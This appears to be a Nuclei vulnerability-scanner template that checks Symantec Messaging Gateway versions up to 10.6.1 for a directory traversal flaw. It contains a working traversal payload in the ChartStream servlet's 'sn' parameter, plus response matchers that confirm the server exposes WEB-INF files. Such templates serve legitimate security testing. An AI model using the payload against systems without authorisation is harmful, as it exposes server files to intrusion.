nuclei-templates/vulnerabilities/other/symantec-messaging-gateway....

24 lines
520 B
YAML

id: symantec-messaging-gateway
info:
name: Symantec Messaging Gateway LFI
author: Random_Robbie
severity: medium
description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal
tags: lfi,messaging,symantec
requests:
- method: GET
path:
- "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/"
matchers-condition: and
matchers:
- type: word
words:
- "struts-default.xml"
- type: status
status:
- 200